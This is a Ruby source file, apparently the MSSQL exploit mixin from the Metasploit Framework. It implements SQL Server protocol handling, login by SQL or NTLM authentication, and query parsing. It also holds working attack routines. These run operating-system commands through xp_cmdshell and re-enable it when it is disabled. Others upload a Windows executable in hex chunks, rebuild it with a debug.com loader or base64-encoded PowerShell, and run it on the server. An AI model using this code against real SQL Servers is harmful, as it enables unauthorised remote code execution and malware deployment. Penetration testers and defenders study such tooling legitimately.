require 'msf/core' require 'msf/core/exploit/mssql_commands' require 'rex/proto/ntlm/crypt' require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' module Msf ### # # This module exposes methods for querying a remote MSSQL service # ### module Exploit::Remote::MSSQL include Exploit::Remote::MSSQL_COMMANDS include Exploit::Remote::Udp include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client # # Constants # NTLM_CRYPT = Rex::Proto::NTLM::Crypt NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_UTILS = Rex::Proto::NTLM::Utils NTLM_XCEPT = Rex::Proto::NTLM::Exceptions # Encryption ENCRYPT_OFF = 0x00 #Encryption is available but off. ENCRYPT_ON = 0x01 #Encryption is available and on. ENCRYPT_NOT_SUP = 0x02 #Encryption is not available. ENCRYPT_REQ = 0x03 #Encryption is required. # Paquet Type TYPE_SQL_BATCH = 1 # (Client) SQL command TYPE_PRE_TDS7_LOGIN = 2 # (Client) Pre-login with version < 7 (unused) TYPE_RPC = 3 # (Client) RPC TYPE_TABLE_RESPONSE = 4 # (Server) Pre-Login Response ,Login Response, Row Data, Return Status, Return Parameters, # Request Completion, Error and Info Messages, Attention Acknowledgement TYPE_ATTENTION_SIGNAL = 6 # (Client) Attention TYPE_BULK_LOAD = 7 # (Client) SQL Command with binary data TYPE_TRANSACTION_MANAGER_REQUEST = 14 # (Client) Transaction request manager TYPE_TDS7_LOGIN = 16 # (Client) Login TYPE_SSPI_MESSAGE = 17 # (Client) Login TYPE_PRE_LOGIN_MESSAGE = 18 # (Client) pre-login with version > 7 # Status STATUS_NORMAL = 0x00 STATUS_END_OF_MESSAGE = 0x01 STATUS_IGNORE_EVENT = 0x02 STATUS_RESETCONNECTION = 0x08 # TDS 7.1+ STATUS_RESETCONNECTIONSKIPTRAN = 0x10 # TDS 7.3+ # # Creates an instance of a MSSQL exploit module. # def initialize(info = {}) super # Register the options that all MSSQL exploits may make use of. register_options( [ Opt::RHOST, Opt::RPORT(1433), OptString.new('USERNAME', [ false, 'The username to authenticate as', 'sa']), OptString.new('PASSWORD', [ false, 'The password for the specified username', '']), OptBool.new('USE_WINDOWS_AUTHENT', [ true, 'Use windows authentification', false]), ], Msf::Exploit::Remote::MSSQL) register_advanced_options( [ OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk", File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b") ]), OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']) ], Msf::Exploit::Remote::MSSQL) register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ]) register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase }) end # # This method sends a UDP query packet to the server and # parses out the reply packet into a hash # def mssql_ping(timeout=5) data = { } ping_sock = Rex::Socket::Udp.create( 'PeerHost' => rhost, 'PeerPort' => 1434, 'Context' => { 'Msf' => framework, 'MsfExploit' => self, }) ping_sock.put("\x02") resp, saddr, sport = ping_sock.recvfrom(65535, timeout) ping_sock.close return data if not resp return data if resp.length == 0 var = nil return mssql_ping_parse(resp) end # # Parse a 'ping' response and format as a hash # def mssql_ping_parse(data) res = {} var = nil idx = data.index('ServerName') return res if not idx data[idx, data.length-idx].split(';').each do |d| if (not var) var = d else if (var.length > 0) res[var] = d var = nil end end end return res end # # Execute a system command via xp_cmdshell # def mssql_xpcmdshell(cmd,doprint=false,opts={}) force_enable = false begin res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts) if(res[:errors] and not res[:errors].empty?) if(res[:errors].join =~ /xp_cmdshell/) if(force_enable) print_error("The xp_cmdshell procedure is not available and could not be enabled") raise RuntimeError, "Failed to execute command" else print_status("The server may have xp_cmdshell disabled, trying to enable it...") mssql_query(mssql_xpcmdshell_enable()) raise RuntimeError, "xp_cmdshell disabled" end end end mssql_print_reply(res) if doprint return res rescue RuntimeError => e if(e.to_s =~ /xp_cmdshell disabled/) force_enable = true retry end raise e end end # # Upload and execute a Windows binary through MSSQL queries # def mssql_upload_exec(exe, debug=false) hex = exe.unpack("H*")[0] var_bypass = rand_text_alpha(8) var_payload = rand_text_alpha(8) print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory") print_status("Writing the debug.com loader to the disk...") h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY'])) h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}") h2b.split(/\n/).each do |line| mssql_xpcmdshell("#{line}", false) end print_status("Converting the debug script to an executable...") mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug) mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug) print_status("Uploading the payload, please be patient...") idx = 0 cnt = 500 while(idx < hex.length - 1) mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false) idx += cnt end print_status("Converting the encoded payload...") mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug) mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug) mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug) print_status("Executing the payload...") mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1}) end # # Upload and execute a Windows binary through MSSQL queries and Powershell # def powershell_upload_exec(exe, debug=false) # hex converter hex = exe.unpack("H*")[0] # create random alpha 8 character names #var_bypass = rand_text_alpha(8) var_payload = rand_text_alpha(8) print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory") # our payload converter, grabs a hex file and converts it to binary for us through powershell h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}.exe',$b)" h2b_unicode=Rex::Text.to_unicode(h2b) # base64 encode it, this allows us to perform execution through powershell without registry changes h2b_encoded = Rex::Text.encode_base64(h2b_unicode) print_status("Uploading the payload #{var_payload}, please be patient...") idx = 0 cnt = 500 while(idx < hex.length - 1) mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false) idx += cnt end print_status("Converting the payload utilizing PowerShell EncodedCommand...") mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug) mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug) print_status("Executing the payload...") mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1}) print_status("Be sure to cleanup #{var_payload}.exe...") end # # Send and receive using TDS # def mssql_send_recv(req, timeout=15, check_status = true) sock.put(req) # Read the 8 byte header to get the length and status # Read the length to get the data # If the status is 0, read another header and more data done = false resp = "" while(not done) head = sock.get_once(8, timeout) if !(head and head.length == 8) return false end # Is this the last buffer? if(head[1,1] == "\x01" or not check_status ) done = true end # Grab this block's length rlen = head[2,2].unpack('n')[0] - 8 while(rlen > 0) buff = sock.get_once(rlen, timeout) return if not buff resp << buff rlen -= buff.length end end resp end # # Encrypt a password according to the TDS protocol (encode) # def mssql_tds_encrypt(pass) # Convert to unicode, swap 4 bits both ways, xor with 0xa5 Rex::Text.to_unicode(pass).unpack('C*').map {|c| (((c & 0x0f) << 4) + ((c & 0xf0) >> 4)) ^ 0xa5 }.pack("C*") end # #this method send a prelogin packet and check if encryption is off # def mssql_prelogin(enc_error=false) pkt = "" pkt_hdr = "" pkt_data_token = "" pkt_data = "" pkt_hdr = [ TYPE_PRE_LOGIN_MESSAGE, #type STATUS_END_OF_MESSAGE, #status 0x0000, #length 0x0000, # SPID 0x00, # PacketID 0x00 #Window ] version = [0x55010008,0x0000].pack("Vv") encryption = ENCRYPT_NOT_SUP # off instoptdata = "MSSQLServer\0" threadid = "\0\0" + Rex::Text.rand_text(2) idx = 21 # size of pkt_data_token pkt_data_token << [ 0x00, # Token 0 type Version idx , # VersionOffset version.length, # VersionLength 0x01, # Token 1 type Encryption idx = idx + version.length, # EncryptionOffset 0x01, # EncryptionLength 0x02, # Token 2 type InstOpt idx = idx + 1, # InstOptOffset instoptdata.length, # InstOptLength 0x03, # Token 3 type Threadid idx + instoptdata.length, # ThreadIdOffset 0x04, # ThreadIdLength 0xFF ].pack("CnnCnnCnnCnnC") pkt_data << pkt_data_token pkt_data << version pkt_data << encryption pkt_data << instoptdata pkt_data << threadid pkt_hdr[2] = pkt_data.length + 8 pkt = pkt_hdr.pack("CCnnCC") + pkt_data resp = mssql_send_recv(pkt) idx = 0 while resp[0,1] != "\xff" and resp.length > 5 token = resp.slice!(0,5) token = token.unpack("Cnn") idx -= 5 if token[0] == 0x01 idx += token[1] break end end if idx > 0 encryption_mode = resp[idx,1].unpack("C")[0] else #force to ENCRYPT_NOT_SUP and hope for the best encryption_mode = ENCRYPT_NOT_SUP end if encryption_mode != ENCRYPT_NOT_SUP and enc_error raise RuntimeError,"Encryption is not supported" end encryption_mode end # # This method connects to the server over TCP and attempts # to authenticate with the supplied username and password # The global socket is used and left connected after auth # def mssql_login(user='sa', pass='', db='') disconnect if self.sock connect # Send a prelogin packet and check that encryption is not enabled if mssql_prelogin() != ENCRYPT_NOT_SUP print_error("Encryption is not supported") return false end if datastore['USE_WINDOWS_AUTHENT'] idx = 0 pkt = '' pkt_hdr = '' pkt_hdr = [ TYPE_TDS7_LOGIN, #type STATUS_END_OF_MESSAGE, #status 0x0000, #length 0x0000, # SPID 0x01, # PacketID (unused upon specification # but ms network monitor stil prefer 1 to decode correctly, wireshark don't care) 0x00 #Window ] pkt << [ 0x00000000, # Size 0x71000001, # TDS Version 0x00000000, # Dummy Size 0x00000007, # Version rand(1024+1), # PID 0x00000000, # ConnectionID 0xe0, # Option Flags 1 0x83, # Option Flags 2 0x00, # SQL Type Flags 0x00, # Reserved Flags 0x00000000, # Time Zone 0x00000000 # Collation ].pack('VVVVVVCCCCVV') cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name sname = Rex::Text.to_unicode( rhost ) dname = Rex::Text.to_unicode( db ) ntlm_options = { :signing => false, :usentlm2_session => datastore['NTLM::UseNTLM2_session'], :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], :send_lm => datastore['NTLM::SendLM'], :send_ntlm => 'NTLM::SendNTLM' } ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) domain_name = datastore['DOMAIN'] # use a default value for now ntlmsspblob = NTLM_UTILS::make_ntlmssp_blob_init(domain_name, workstation_name, ntlmssp_flags) idx = pkt.size + 50 # lengths below pkt << [idx, cname.length / 2].pack('vv') idx += cname.length pkt << [0, 0].pack('vv') # User length offset must be 0 pkt << [0, 0].pack('vv') # Password length offset must be 0 pkt << [idx, aname.length / 2].pack('vv') idx += aname.length pkt << [idx, sname.length / 2].pack('vv') idx += sname.length pkt << [0, 0].pack('vv') # unused pkt << [idx, aname.length / 2].pack('vv') idx += aname.length pkt << [idx, 0].pack('vv') # locales pkt << [idx, 0].pack('vv') #db # ClientID (should be mac address) pkt << Rex::Text.rand_text(6) # NTLMSSP pkt << [idx, ntlmsspblob.length].pack('vv') idx += ntlmsspblob.length pkt << [idx, 0].pack('vv') # AtchDBFile pkt << cname pkt << aname pkt << sname pkt << aname pkt << ntlmsspblob # Total packet length pkt[0,4] = [pkt.length].pack('V') pkt_hdr[2] = pkt.length + 8 pkt = pkt_hdr.pack("CCnnCC") + pkt # Rem : One have to set check_status to false here because sql server sp0 (and maybe above) # has a strange behavior that differs from the specifications # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification resp = mssql_send_recv(pkt,15, false) # Get default data begin blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(resp) # a domain.length < 3 will hit this rescue NTLM_XCEPT::NTLMMissingChallenge info = {:errors => []} mssql_parse_reply(resp, info) mssql_print_reply(info) return false end challenge_key = blob_data[:challenge_key] server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error #netbios name default_name = blob_data[:default_name] || '' #netbios domain default_domain = blob_data[:default_domain] || '' #dns name dns_host_name = blob_data[:dns_host_name] || '' #dns domain dns_domain_name = blob_data[:dns_domain_name] || '' #Client time chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' spnopt = {:use_spn => datastore['NTLM::SendNTLM'], :name => self.rhost} resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(user, pass, challenge_key, domain_name, default_name, default_domain, dns_host_name, dns_domain_name, chall_MsvAvTimestamp, spnopt, ntlm_options) ntlmssp = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, user, resp_lm, resp_ntlm, '', ntlmssp_flags) # Create an SSPIMessage idx = 0 pkt = '' pkt_hdr = '' pkt_hdr = [ TYPE_SSPI_MESSAGE, #type STATUS_END_OF_MESSAGE, #status 0x0000, #length 0x0000, # SPID 0x01, # PacketID 0x00 #Window ] pkt_hdr[2] = ntlmssp.length + 8 pkt = pkt_hdr.pack("CCnnCC") + ntlmssp resp = mssql_send_recv(pkt) #SQL Server Authentification else idx = 0 pkt = '' pkt << [ 0x00000000, # Dummy size 0x71000001, # TDS Version 0x00000000, # Size 0x00000007, # Version rand(1024+1), # PID 0x00000000, # ConnectionID 0xe0, # Option Flags 1 0x03, # Option Flags 2 0x00, # SQL Type Flags 0x00, # Reserved Flags 0x00000000, # Time Zone 0x00000000 # Collation ].pack('VVVVVVCCCCVV') cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) uname = Rex::Text.to_unicode( user ) pname = mssql_tds_encrypt( pass ) aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) sname = Rex::Text.to_unicode( rhost ) dname = Rex::Text.to_unicode( db ) idx = pkt.size + 50 # lengths below pkt << [idx, cname.length / 2].pack('vv') idx += cname.length pkt << [idx, uname.length / 2].pack('vv') idx += uname.length pkt << [idx, pname.length / 2].pack('vv') idx += pname.length pkt << [idx, aname.length / 2].pack('vv') idx += aname.length pkt << [idx, sname.length / 2].pack('vv') idx += sname.length pkt << [0, 0].pack('vv') pkt << [idx, aname.length / 2].pack('vv') idx += aname.length pkt << [idx, 0].pack('vv') pkt << [idx, dname.length / 2].pack('vv') idx += dname.length # The total length has to be embedded twice more here pkt << [ 0, 0, 0x12345678, 0x12345678 ].pack('vVVV') pkt << cname pkt << uname pkt << pname pkt << aname pkt << sname pkt << aname pkt << dname # Total packet length pkt[0,4] = [pkt.length].pack('V') # Embedded packet lengths pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2 # Packet header and total length including header pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt resp = mssql_send_recv(pkt) end info = {:errors => []} info = mssql_parse_reply(resp,info) return false if not info info[:login_ack] ? true : false end # # Login to the SQL server using the standard USERNAME/PASSWORD options # def mssql_login_datastore(db='') mssql_login(datastore['USERNAME'], datastore['PASSWORD'], db) end # # Issue a SQL query using the TDS protocol # def mssql_query(sqla, doprint=false, opts={}) info = { :sql => sqla } opts[:timeout] ||= 15 pkts = [] idx = 0 bsize = 4096 - 8 chan = 0 @cnt ||= 0 @cnt += 1 sql = Rex::Text.to_unicode(sqla) while(idx < sql.length) buf = sql[idx, bsize] flg = buf.length < bsize ? "\x01" : "\x00" pkts << "\x01" + flg + [buf.length + 8].pack('n') + [chan].pack('n') + [@cnt].pack('C') + "\x00" + buf idx += bsize end resp = mssql_send_recv(pkts.join, opts[:timeout]) mssql_parse_reply(resp, info) mssql_print_reply(info) if doprint info end # # Nicely print the results of a SQL query # def mssql_print_reply(info) print_status("SQL Query: #{info[:sql]}") if(info[:done] and info[:done][:rows].to_i > 0) print_status("Row Count: #{info[:done][:rows]} (Status: #{info[:done][:status]} Command: #{info[:done][:cmd]})") end if(info[:errors] and not info[:errors].empty?) info[:errors].each do |err| print_error(err) end end if(info[:rows] and not info[:rows].empty?) tbl = Rex::Ui::Text::Table.new( 'Indent' => 1, 'Header' => "", 'Columns' => info[:colnames] ) info[:rows].each do |row| tbl << row end print_line(tbl.to_s) end end # # Parse a raw TDS reply from the server # def mssql_parse_tds_reply(data, info) info[:errors] ||= [] info[:colinfos] ||= [] info[:colnames] ||= [] # Parse out the columns cols = data.slice!(0,2).unpack('v')[0] 0.upto(cols-1) do |col_idx| col = {} info[:colinfos][col_idx] = col col[:utype] = data.slice!(0,2).unpack('v')[0] col[:flags] = data.slice!(0,2).unpack('v')[0] col[:type] = data.slice!(0,1).unpack('C')[0] case col[:type] when 48 col[:id] = :tinyint when 52 col[:id] = :smallint when 56 col[:id] = :rawint when 61 col[:id] = :datetime when 34 col[:id] = :image col[:max_size] = data.slice!(0,4).unpack('V')[0] col[:value_length] = data.slice!(0,2).unpack('v')[0] col[:value] = data.slice!(0, col[:value_length] * 2).gsub("\x00", '') when 36 col[:id] = :string when 38 col[:id] = :int col[:int_size] = data.slice!(0,1).unpack('C')[0] when 127 col[:id] = :bigint when 165 col[:id] = :hex col[:max_size] = data.slice!(0,2).unpack('v')[0] when 173 col[:id] = :hex # binary(2) col[:max_size] = data.slice!(0,2).unpack('v')[0] when 231,175,167,239 col[:id] = :string col[:max_size] = data.slice!(0,2).unpack('v')[0] col[:codepage] = data.slice!(0,2).unpack('v')[0] col[:cflags] = data.slice!(0,2).unpack('v')[0] col[:charset_id] = data.slice!(0,1).unpack('C')[0] else col[:id] = :unknown end col[:msg_len] = data.slice!(0,1).unpack('C')[0] if(col[:msg_len] and col[:msg_len] > 0) col[:name] = data.slice!(0, col[:msg_len] * 2).gsub("\x00", '') end info[:colnames] << (col[:name] || 'NULL') end end # # Parse individual tokens from a TDS reply # def mssql_parse_reply(data, info) info[:errors] = [] return if not data until data.empty? token = data.slice!(0,1).unpack('C')[0] case token when 0x81 mssql_parse_tds_reply(data, info) when 0xd1 mssql_parse_tds_row(data, info) when 0xe3 mssql_parse_env(data, info) when 0x79 mssql_parse_ret(data, info) when 0xfd, 0xfe, 0xff mssql_parse_done(data, info) when 0xad mssql_parse_login_ack(data, info) when 0xab mssql_parse_info(data, info) when 0xaa mssql_parse_error(data, info) when nil break else info[:errors] << "unsupported token: #{token}" end end info end # # Parse a single row of a TDS reply # def mssql_parse_tds_row(data, info) info[:rows] ||= [] row = [] info[:colinfos].each do |col| if(data.length == 0) row << "" next end case col[:id] when :hex str = "" len = data.slice!(0,2).unpack('v')[0] if(len > 0 and len < 65535) str << data.slice!(0,len) end row << str.unpack("H*")[0] when :string str = "" len = data.slice!(0,2).unpack('v')[0] if(len > 0 and len < 65535) str << data.slice!(0,len) end row << str.gsub("\x00", '') when :datetime row << data.slice!(0,8).unpack("H*")[0] when :rawint row << data.slice!(0,4).unpack('V')[0] when :bigint row << data.slice!(0,8).unpack("H*")[0] when :smallint row << data.slice!(0, 2).unpack("v")[0] when :smallint3 row << [data.slice!(0, 3)].pack("Z4").unpack("V")[0] when :tinyint row << data.slice!(0, 1).unpack("C")[0] when :image str = '' len = data.slice!(0,1).unpack('C')[0] str = data.slice!(0,len) if (len and len > 0) row << str.unpack("H*")[0] when :int len = data.slice!(0, 1).unpack("C")[0] raw = data.slice!(0, len) if (len and len > 0) case len when 0,255 row << '' when 1 row << raw.unpack("C")[0] when 2 row << raw.unpack('v')[0] when 4 row << raw.unpack('V')[0] when 5 row << raw.unpack('V')[0] # XXX: missing high byte when 8 row << raw.unpack('VV')[0] # XXX: missing high dword else info[:errors] << "invalid integer size: #{len} #{data[0,16].unpack("H*")[0]}" end else info[:errors] << "unknown column type: #{col.inspect}" end end info[:rows] << row info end # # Parse a "ret" TDS token # def mssql_parse_ret(data, info) ret = data.slice!(0,4).unpack('N')[0] info[:ret] = ret info end # # Parse a "done" TDS token # def mssql_parse_done(data, info) status,cmd,rows = data.slice!(0,8).unpack('vvV') info[:done] = { :status => status, :cmd => cmd, :rows => rows } info end # # Parse an "error" TDS token # def mssql_parse_error(data, info) len = data.slice!(0,2).unpack('v')[0] buff = data.slice!(0,len) errno,state,sev,elen = buff.slice!(0,8).unpack('VCCv') emsg = buff.slice!(0,elen * 2) emsg.gsub!("\x00", '') info[:errors] << "SQL Server Error ##{errno} (State:#{state} Severity:#{sev}): #{emsg}" info end # # Parse an "environment change" TDS token # def mssql_parse_env(data, info) len = data.slice!(0,2).unpack('v')[0] buff = data.slice!(0,len) type = buff.slice!(0,1).unpack('C')[0] nval = '' nlen = buff.slice!(0,1).unpack('C')[0] || 0 nval = buff.slice!(0,nlen*2).gsub("\x00", '') if nlen > 0 oval = '' olen = buff.slice!(0,1).unpack('C')[0] || 0 oval = buff.slice!(0,olen*2).gsub("\x00", '') if olen > 0 info[:envs] ||= [] info[:envs] << { :type => type, :old => oval, :new => nval } info end # # Parse an "information" TDS token # def mssql_parse_info(data, info) len = data.slice!(0,2).unpack('v')[0] buff = data.slice!(0,len) errno,state,sev,elen = buff.slice!(0,8).unpack('VCCv') emsg = buff.slice!(0,elen * 2) emsg.gsub!("\x00", '') info[:infos]||= [] info[:infos] << "SQL Server Info ##{errno} (State:#{state} Severity:#{sev}): #{emsg}" info end # # Parse a "login ack" TDS token # def mssql_parse_login_ack(data, info) len = data.slice!(0,2).unpack('v')[0] buff = data.slice!(0,len) info[:login_ack] = true end end end